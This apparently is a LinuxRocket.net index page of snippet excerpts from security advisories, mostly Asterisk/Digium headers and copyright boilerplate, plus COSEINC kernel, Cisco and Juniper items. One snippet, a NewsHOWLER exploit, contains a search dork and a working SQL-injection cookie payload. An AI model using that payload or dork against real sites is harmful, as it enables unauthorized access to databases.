New User, Welcome!     Login

Next Page >>

All Rights Reserved

AST-2007-025 - SQL Injection issue in res_config_pgsql

   |-----------------+------------------------+-----------------------------|
   | 2007-11-29      | Tilghman Lesher        | Initial release             |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2007-025
              Copyright (c) 2007 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

AST-2008-003: Unauthenticated calls allowed from SIP channel driver

   |------------------+---------------------+-------------------------------|
   | 2008-03-18       | Jason Parker        | Initial Release               |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2008-003
              Copyright (c) 2008 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

AST-2009-001: Information leak in IAX2 authentication

   |-----------------+------------------------+-----------------------------|
   | 2009-01-07      | Tilghman Lesher        | Initial release             |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2009-001
              Copyright (c) 2009 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

ASA-2007-019: Remote crash vulnerability in Skinny channel driver

   |--------------------+------------------------+--------------------------|
   | August 7, 2007     | jparker@digium.com     | Initial Release          |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - ASA-2007-019
              Copyright (c) 2007 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

AST-2008-011: Traffic amplification in IAX2 firmware provisioning system

   |-----------------+--------------------+---------------------------------|
   | July 22, 2008   | Tilghman Lesher    | Revised C.1 version numbers     |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2008-011
              Copyright (c) 2008 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

RE: XSS vulnerability in Cisco MeetingPlace

session; the version information is provided at the bottom of the
home page.  The following output shows an example of the text
viewable when accessing the home page of a MeetingPlace Web
Conferencing server running software version 5.3.447.4: 

Copyright C 1992-2007 Cisco Systems, Inc. All Rights Reserved. 
Version: 5.3.447.4

Workarounds
===========

AST-2007-023 - SQL Injection Vulnerabilty in cdr_addon_mysql

   |-----------------+-----------------------+------------------------------|
   | 2007-10-16      | Tilghman Lesher       | Added CVE number             |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - 2007-AST-023
              Copyright (c) 2007 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

AST-2007-024 - Fallacious security advisory spread on the Internet involving buffer overflow in Zaptel's sethdlc application

    | 10/31/2007 | Mark Michelson | Changed severity, description, and       |
    |            |                | resolution                               |
    +------------------------------------------------------------------------+

                Asterisk Project Security Advisory - AST-2007-024
               Copyright (c) 2007 Digium, Inc. All Rights Reserved.
   Permission is hereby granted to distribute and publish this advisory in its
                            original, unaltered form.

Juniper Advisory

                Version: 6.2.0r1.0 (Firewall+VPN)

                ScreenOS WebUI
                Copyright © 1997-2008 Juniper Networks, Inc.
                All Rights Reserved.


                For the latest technical information visit:
                http://www.juniper.net

AST-2009-002: Remote Crash Vulnerability in SIP channel driver

   |------------------+--------------------+--------------------------------|
   | 2009-03-10       | Joshua Colp        | Initial release                |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2009-002
              Copyright (c) 2009 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

NewsHOWLER 1.03 Beta Cookie Handling Via Sql injection

#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       #
#####################################################################################
#                                                                                   #
#Download : http://garr.dl.sourceforge.net/sourceforge/newshowler/NewsHOWLER-1.03-Beta.tgz
#                                                                                   #
#DORK : "Net Dupe © 2002. All Rights Reserved"                                      #
#                                                                                   #
#####################################################################################
#                                   [Exploit]                                       #
#                                                                                   #
#javascript:document.cookie = "news_user=zz'+union+select+3,3,3,3+from+news_users/*; path=/";

AST-2007-022: Buffer overflows in voicemail when using IMAP storage

    |--------------------+---------------------------+-----------------------|
    | October 9, 2007    | mmichelson@digium.com     | Initial Release       |
    +------------------------------------------------------------------------+

                Asterisk Project Security Advisory - AST-2007-022
               Copyright (c) 2007 Digium, Inc. All Rights Reserved.
   Permission is hereby granted to distribute and publish this advisory in its
                            original, unaltered form.

AST-2008-008: Remote Crash Vulnerability in SIP channel driver when run in pedantic mode

   |------------------+--------------------+--------------------------------|
   | 2008-06-03       | Joshua Colp        | Initial Release                |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2008-008
              Copyright (c) 2008 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

AST-2007-021: Crash from invalid/corrupted MIME bodies when using voicemail with IMAP storage

   |----------------------+---------------------+---------------------------|
   | August 24, 2007      | Mark Michelson      | Initial Release           |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2007-021
              Copyright (c) 2007 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

CSA-L03: Linux kernel vmsplice unchecked user-pointer dereference

===[ LEGAL DISCLAIMER ]=================================================

Copyright (c) 2008 Wojciech Purczynski
Copyright (c) 2008 COSEINC PTE Ltd.

All Rights Reserved.

PUBLISHING, DISTRIBUTING, PRINTING, COPYING, SCANNING, DUPLICATING IN
ANY FORM, MODIFYING WITHOUT PRIOR WRITTEN PERMISSION IS STRICTLY
PROHIBITED.

AST-2011-013: Possible remote enumeration of SIP endpoints with differing NAT settings

                                Revision History
           Date                 Editor                 Revisions Made         

               Asterisk Project Security Advisory - AST-2011-013
              Copyright (c) 2011 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

AST-2011-007

   |-------------------+-------------------------+--------------------------|
   | 06/02/11          | Jonathan Rose           | Initial Release          |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2011-007
              Copyright (c) 2011 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

AST-2010-003: Invalid parsing of ACL rules can compromise security

   |-------------------+----------------------+-----------------------------|
   | Feb 24, 2010      | Mark Michelson       | Initial Advisory            |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2010-003
              Copyright (c) 2010 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

COSEINC Linux Advisory #2: IA32 System Call Emulation Vulnerability

===[ LEGAL DISCLAIMER ]=================================================

Copyright (c) 2007 Wojciech Purczynski
Copyright (c) 2007 COSEINC PTE Ltd.

All Rights Reserved.

PUBLISHING, DISTRIBUTING, PRINTING, COPYING, SCANNING, DUPLICATING IN
ANY FORM, MODIFYING WITHOUT PRIOR WRITTEN PERMISSION IS STRICTLY
PROHIBITED.

/home/putnopvut/asa/AST-2008-007/AST-2008-007: AST-2008-007 Cryptographic keys generated by OpenSSL on Debian-based systems compromised

   |-------------------+----------------------+-----------------------------|
   | May 15, 2008      | Mark Michelson       | Initial advisory            |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2008-007
              Copyright (c) 2008 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

AST-2008-004: Format String Vulnerability in Logger and Manager

   |------------------+--------------------+--------------------------------|
   | 2008-03-18       | Joshua Colp        | Initial Release                |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2008-004
              Copyright (c) 2008 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

AST-2008-006 - 3-way handshake in IAX2 incomplete

   |---------------------+----------------------+---------------------------|
   | April 22, 2008      | Tilghman Lesher      | Initial release           |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2008-006
              Copyright (c) 2008 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

AST-2007-027 - Database matching order permits host-based authentication to be ignored

   |-----------------+------------------------+-----------------------------|
   | 2007-12-18      | Tilghman Lesher        | Initial Release             |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2007-027
              Copyright (c) 2007 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

AST-2007-020: Resource Exhaustion Vulnerability in Asterisk SIP channel driver

   |---------------------+------------------------+-------------------------|
   | August 21, 2007     | russell@digium.com     | Initial Release         |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2007-020
              Copyright (c) 2007 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

COSEINC Linux Advisory #1: Linux Kernel Parent Process Death Signal Vulnerability

===[ LEGAL DISCLAIMER ]=================================================

Copyright (c) 2006,2007 Wojciech Purczynski
Copyright (c) 2007 COSEINC PTE Ltd.

All Rights Reserved.

PUBLISHING, DISTRIBUTING, PRINTING, COPYING, SCANNING, DUPLICATING IN
ANY FORM, MODIFYING WITHOUT PRIOR WRITTEN PERMISSION IS STRICTLY
PROHIBITED.

AST-2008-009: AST-2008-007 Cryptographic keys generated by OpenSSL on Debian-based systems compromised

   |-------------------+----------------------+-----------------------------|
   | Jun 3, 2008       | Mark Michelson       | Initial draft               |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2008-009
              Copyright (c) 2008 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

AST-2007-026 - SQL Injection issue in cdr_pgsql

   |-----------------+------------------------+-----------------------------|
   | 2007-11-29      | Tilghman Lesher        | Initial release             |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2007-026
              Copyright (c) 2007 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

AST-2008-002: Two buffer overflows in RTP Codec Payload Handling

   |------------------+--------------------+--------------------------------|
   | 2008-03-18       | Joshua Colp        | Initial Release                |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2008-002
              Copyright (c) 2008 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

AST-2009-010: RTP Remote Crash Vulnerability

   |------------------+---------------------+-------------------------------|
   | 2009-09-03       | David Vossel        | Initial release               |
   +------------------------------------------------------------------------+

               Asterisk Project Security Advisory - AST-2009-010
              Copyright (c) 2009 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.

AST-2011-005: File Descriptor Resource Exhaustion

                                Revision History
          Date                 Editor                  Revisions Made         
   04/21/11           Matthew Nicholson        Initial version                

               Asterisk Project Security Advisory - AST-2011-005
              Copyright (c) 2011 Digium, Inc. All Rights Reserved.
  Permission is hereby granted to distribute and publish this advisory in its
                           original, unaltered form.
Next Page>>

Copyright © 1995-2012 LinuxRocket.net. All rights reserved.

Nearly all of LinuxRocket's features are free. Be kind and donate to the cause!